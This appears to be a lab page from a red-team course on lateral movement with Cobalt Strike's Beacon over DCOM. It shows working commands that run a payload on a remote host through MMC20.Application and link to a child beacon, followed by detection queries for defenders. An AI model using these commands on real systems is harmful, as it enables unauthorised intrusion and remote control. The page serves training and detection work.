DCOM

Beacon has no built-in capabilities to interact over Distributed Component Object Model (DCOM), so we must use an external tool such as Invoke-DCOM. We'll see in a later module how this can be integrated into the jump command.

beacon> powershell-import C:\Tools\Invoke-DCOM.ps1
beacon> powershell Invoke-DCOM -ComputerName web.dev.cyberbotic.io -Method MMC20.Application -Command C:\Windows\smb_x64.exe
Completed

beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
[+] established link to child beacon: 10.10.122.30

DCOM is more complicated to detect, since each "Method" works in a different way. In the particular case of MMC20.Application, the spawned process will be a child of mmc.exe.

event.category: process and event.type : start and process.parent.name: mmc.exe

Processes started via DCOM may also be observed where the parent is svchost.exe with command line arguments of -k DcomLaunch.

PreviousThe Curious Case of CoInitializeSecurity NextSession Passing

Last updated 1 year ago